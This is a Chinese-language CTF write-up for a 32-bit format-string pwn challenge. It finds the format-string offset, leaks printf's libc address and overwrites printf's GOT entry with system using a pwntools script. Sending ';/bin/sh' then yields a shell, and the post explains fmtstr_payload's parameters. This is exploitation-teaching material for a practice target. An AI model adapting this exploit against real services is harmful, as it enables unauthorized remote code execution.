照例检查程序保护情况
堆栈不可执行,再导入ida看一下代码逻辑
如上图此处代码有格式化字符串漏洞
先找出偏移
可以发现偏移是8
那么我们可以利用printf泄露出libc地址,如何修改printf_got表为system的地址,然后再传入/bin/sh就可以getshell
exp:
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug')io=remote("node5.buuoj.cn",28264) elf=ELF("./pwn") printf_got=elf.got['printf'] io.recvuntil(b"Please tell me:") payload=b'A'+p32(printf_got)+b'B'+b"%8$s" io.send(payload) io.recvuntil(b"B") printf_addr=u32(io.recv(4)) print(hex(printf_addr))
#libc=LibcSearcher("printf",printf_addr) #base=printf_addr-libc.dump("printf") #system_addr=base+libc.dump("system") libc=ELF("./libc-2.23.so") base=printf_addr-libc.sym['printf'] system_addr=base+libc.sym['system']
payload2=b"a"+fmtstr_payload(8,{printf_got:system_addr},write_size = "byte",numbwritten = 0xa) 这里的0xa是前面'a'加上'repeater:'为10个字符 io.recvuntil(b"Please tell me:") io.send(payload2) io.sendline(b";/bin/sh\x00") io.interactive()
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)
第一个参数表示格式化字符串的偏移
第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress};
第三个参数表示已经输出的字符个数
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写
标签:addr,--,system,fmt32,axb,libc,io,printf,got From: https://www.cnblogs.com/GGbomb/p/17988305